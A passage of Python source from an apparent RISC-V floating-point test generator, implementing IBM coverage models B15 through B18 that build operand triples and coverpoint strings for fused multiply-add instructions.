                comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
            # --- Region 3: sweep every addend exponent in the clamped band ---
            # [-(2p + 1), (p + 1)] relative to the product exponent.
            if flen == 32:
                ul = int(rs1_exp,2)+33
                ll = int(rs1_exp,2)-65
                if int(rs1_exp,2) >= 222: ul = 255
                if int(rs1_exp,2) < 65: ll = 0
            elif flen == 64:
                ul = int(rs1_exp,2)+65
                ll = int(rs1_exp,2)-129
                if int(rs1_exp,2) >= 958: ul = 1023
                if int(rs1_exp,2) < 129: ll = 0
            for expval in range (ll, ul):
                rs2_exp = expval
                if flen == 32:
                    comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference between -(2p+1) and (p+1)'
                    rs2_exp = '{:08b}'.format(rs2_exp)
                elif flen == 64:
                    comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference between -(2p+1) and (p+1)'
                    rs2_exp = '{:011b}'.format(rs2_exp)
                # New multiplicand split per exponent value (fresh random draw).
                mul = fields_dec_converter(flen,rs1[i])
                rs1_act = random.uniform(1,limnum)
                rs2_act = mul/rs1_act
                for j in range(len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_man = '0'*j + rs1_man[j:]                   # Leading 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j)          # Leading 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
                    rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j)   # Trailing 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j)          # Trailing 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
                for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j)          # Long sequence of 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j)          # Long sequence of 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
                chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
                for j in chkrbrd:
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = j
                    for k in range(math.ceil(len(rs1_man)/len(j))):
                        rs2_man += j
                    rs2_man = rs2_man[0:flen-e_sz-1]
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                    comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
    # Render each operand triple as per-field coverpoint constraints plus the
    # matching human-readable comment.
    coverpoints = []
    k = 0
    for c in b15_comb:
        cvpt = ""
        for x in range(1, 4):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B15 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b16(flen, opcode, ops, seed=-1):
    '''
    IBM Model B16 Definition:
        This model tests every possible value for cancellation.
        For the difference between the exponent of the intermediate result and the
        maximum between the exponents of the addend and the multiplication result,
        test all values in the range:
        [-(2 * p + 1), 1].

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Result.exp - max(addend.exp, multiplication result.exp) ∈ [-(2 * p + 1), 1] → Condition 1
        Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1

    Implementation:
        - Random values of operands 1 and 2 are obtained from the random library.
        - Since the objective of the test is to cancel the operands among each other constrained by the above condition, the intermediate result is calculated by the multiplication of operand 1 and 2, and operand 3 is solved for so that the fused operation cancels down to the chosen intermediate result.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode '0' for that particular opcode.
    '''
    # Drop the precision suffix (e.g. 'fmadd.s' -> 'fmadd').
    opcode = opcode.split('.')[0]
    # Decimal precision for the exact flen == 64 arithmetic below.
    getcontext().prec = 40
    # Precision-dependent bounds for the random draws. For flen == 64 the
    # upper bound is 2**508 (ieee754_limnum) so rs1*rs2 cannot overflow.
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        limnum = maxnum
    elif flen == 64:
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_limnum = '0x1.fffffffffffffp+507'
        limnum = float.fromhex(ieee754_limnum)
    # Deterministic per-opcode default seeds keep regenerated coverpoints stable.
    if seed == -1:
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fmsub':
            random.seed(1)
        elif opcode in 'fnmadd':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    b16_comb = []
    for i in range(200):
        # Draw multiplicands and a target intermediate result ir, then solve
        # for rs3 so that opcode(rs1, rs2, rs3) cancels down to ir. The
        # flen == 64 path uses Decimal so the solved rs3 is exact.
        rs1 = random.uniform(minsubnorm,limnum)
        rs2 = random.uniform(minsubnorm,limnum)
        ir = random.uniform(minsubnorm,rs1*rs2)
        if opcode in 'fmadd':        # ir = rs1*rs2 + rs3
            if flen == 32:
                rs3 = ir - rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
        elif opcode in 'fnmadd':     # ir = -(rs1*rs2) - rs3
            if flen == 32:
                rs3 = -1*rs1*rs2 - ir
            elif flen == 64:
                rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fmsub':      # ir = rs1*rs2 - rs3
            if flen == 32:
                rs3 = rs1*rs2 - ir
            elif flen == 64:
                rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fnmsub':     # ir = -(rs1*rs2) + rs3
            if flen == 32:
                rs3 = ir + rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
        if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
            b16_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    # Render each operand triple as per-field coverpoint constraints plus a
    # human-readable trailing comment.
    coverpoints = []
    comment = ' | Multiply-Add: Cancellation'
    for c in b16_comb:
        cvpt = ""
        for x in range(1, 4):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B16 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b17(flen, opcode, ops, seed=-1):
    '''
    IBM Model B17 Definition:
        This model tests all combinations of cancellation values as in model (B16), with
        all possible unbiased exponent values of subnormal results.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Result.exp - max(addend.exp, multiplication result.exp) ∈ [-(2 * p + 1), 1] → Condition 1 (Exponents are subnormal)
        Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1

    Implementation:
        - It functions the same as model B16 except that the target intermediate result is drawn from the subnormal range, so the cancellation produces a subnormal result.
        - Operands 1 and 2 are randomly initialized in the range and the subsequent operand value is found.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode '0' for that particular opcode.
    '''
    # Drop the precision suffix (e.g. 'fmadd.s' -> 'fmadd').
    opcode = opcode.split('.')[0]
    # Decimal precision for the exact flen == 64 arithmetic below.
    getcontext().prec = 40
    # Precision-dependent bounds. The intermediate result is drawn from the
    # subnormal range [minsubnorm, maxsubnorm]; for flen == 64 the operand
    # draws are capped at 2**508 (ieee754_limnum) so rs1*rs2 cannot overflow.
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.7fffffp-126'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        limnum = maxnum
    elif flen == 64:
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        ieee754_limnum = '0x1.fffffffffffffp+507'
        limnum = float.fromhex(ieee754_limnum)
    # Deterministic per-opcode default seeds keep regenerated coverpoints stable.
    if seed == -1:
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fmsub':
            random.seed(1)
        elif opcode in 'fnmadd':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    b17_comb = []
    for i in range(200):
        # Draw multiplicands and a SUBNORMAL target intermediate result ir,
        # then solve for rs3 so that opcode(rs1, rs2, rs3) cancels down to ir.
        rs1 = random.uniform(minsubnorm,limnum)
        rs2 = random.uniform(minsubnorm,limnum)
        ir = random.uniform(minsubnorm,maxsubnorm)
        # Keep ir below the product so the cancellation direction is valid.
        if ir > rs1*rs2: ir = random.uniform(minsubnorm,rs1*rs2)
        if opcode in 'fmadd':        # ir = rs1*rs2 + rs3
            if flen == 32:
                rs3 = ir - rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
        elif opcode in 'fnmadd':     # ir = -(rs1*rs2) - rs3
            if flen == 32:
                rs3 = -1*rs1*rs2 - ir
            elif flen == 64:
                rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fmsub':      # ir = rs1*rs2 - rs3
            if flen == 32:
                rs3 = rs1*rs2 - ir
            elif flen == 64:
                rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fnmsub':     # ir = -(rs1*rs2) + rs3
            if flen == 32:
                rs3 = ir + rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
        if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
            b17_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    # Render each operand triple as per-field coverpoint constraints plus a
    # human-readable trailing comment.
    coverpoints = []
    comment = ' | Multiply-Add: Cancellation ---> Subnormal result '
    for c in b17_comb:
        cvpt = ""
        for x in range(1, 4):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B17 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b18(flen, opcode, ops, seed=-1):
    '''
    IBM Model B18 Definition:
    This model checks different cases where the multiplication causes some event
    in the product while the addition cancels this event.
    1. Product: Enumerate all options for LSB, Guard and Sticky bit. Intermediate Result: Exact (Guard and Sticky are zero).
    2. Product: Take overflow values from (B4) "Overflow". Intermediate Result: No overflow
    3. Product: Take underflow values from model (B5) "Underflow". Intermediate Result: No underflow
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int
    Implementation:
    - Firstly, cancellation using the B3 model as base is performed.
    - Next model is the replica of the B4 model which takes into account the overflow of value for guard, round and sticky bits
    - The final model is obtained from the B5 model and different operations are done for underflow in decimal format.
    - The operand values are calculated using the intermediate results dataset and then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with rounding mode “0” for that particular opcode.
    '''
    # Strip the precision suffix ('.s'/'.d') so the substring checks below work on the base opcode.
    opcode = opcode.split('.')[0]
    # High Decimal precision so the flen==64 arithmetic below does not lose mantissa bits.
    getcontext().prec = 40
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        # NOTE: 'in' performs a substring test on the opcode string here.
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fnmadd':
            random.seed(1)
        elif opcode in 'fmsub':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    # Cancellation of B3
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_num = []
        lsb = []
        # Record the LSB parity of each base operand twice: once for the
        # positive variant and once for the negated variant appended below.
        for i in fsubnorm+fnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = float.hex(fields_dec_converter(32,i))
            # Keep both signs of every value; slicing trims the hex significand
            # to the single-precision digit count.
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
                ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
            else:
                ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
                ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
        ir_dataset = []
        # Append an extra hex digit (guard/round/sticky pattern i) to each
        # significand to create intermediate results with non-zero G/S bits.
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        lsb = []
        for i in dsubnorm+dnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = str(fields_dec_converter(64,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val)
                ieee754_num.append('-'+float_val)
            else:
                ieee754_num.append(float_val)
                ieee754_num.append(float_val[1:])
        ir_dataset = []
        # For doubles, perturb the decimal significand by pow(i*16, -14) to
        # emulate the extra guard/round/sticky digit used in the 32-bit path.
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
    b18_comb = []
    # Solve backwards: given an intermediate product value ir_dataset[i][0] and
    # a fixed final result 'res', derive rs2 and rs3 so the fused op hits it.
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        res = '0x1.7ffff0p+100'
        res = float.fromhex(res)
        if opcode in 'fmadd':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = -1*res + ir_dataset[i][0]
            elif flen == 64:
                # NOTE(review): sign differs from the flen==32 branch above
                # (-res + ir vs -res - ir); confirm the intended intermediate
                # result before relying on the 64-bit fnmadd coverpoints.
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = ir_dataset[i][0] - res
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        # Round-trip through single precision so operands are representable.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    ir_dataset1 = ir_dataset
    # Cancellation of B4
    if flen == 32:
        ieee754_maxnorm_p = '0x1.7fffffp+127'
        ieee754_maxnorm_n = '0x1.7ffffep+127'
        maxnum = float.fromhex(ieee754_maxnorm_p)
        ir_dataset = []
        # Intermediate results straddling maxnorm by a few ulps (overflow side).
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
            ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        maxdec_p = str(maxnum)
        maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
        ir_dataset = []
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
            ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
    # Same backwards-solving scheme as the B3 section above.
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        res = '0x1.7ffff0p+100'
        res = float.fromhex(res)
        if opcode in 'fmadd':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = -1*res + ir_dataset[i][0]
            elif flen == 64:
                # NOTE(review): same sign inconsistency as in the B3 section.
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = ir_dataset[i][0] - res
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    ir_dataset2 = ir_dataset
    # Cancellation of B5
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        ir_dataset = []
        # Intermediate results around minsubnorm/minnorm (underflow side).
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        ieee754_minnorm = '0x1.000000p-126'
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        n = len(ir_dataset)
        # Convert to float and mirror each entry with its negation.
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
            ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubdec = '5e-324'
        ir_dataset = []
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        minnormdec = '2.2250738585072014e-308'
        ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
        ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        n = len(ir_dataset)
        # Mirror with negated (string) values; Decimal() parses the '-' prefix.
        for i in range(n):
            ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        res = '0x1.7ffff0p+100'
        res = float.fromhex(res)
        if opcode in 'fmadd':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = -1*res + ir_dataset[i][0]
            elif flen == 64:
                # NOTE(review): same sign inconsistency as in the B3 section.
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = ir_dataset[i][0] - res
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
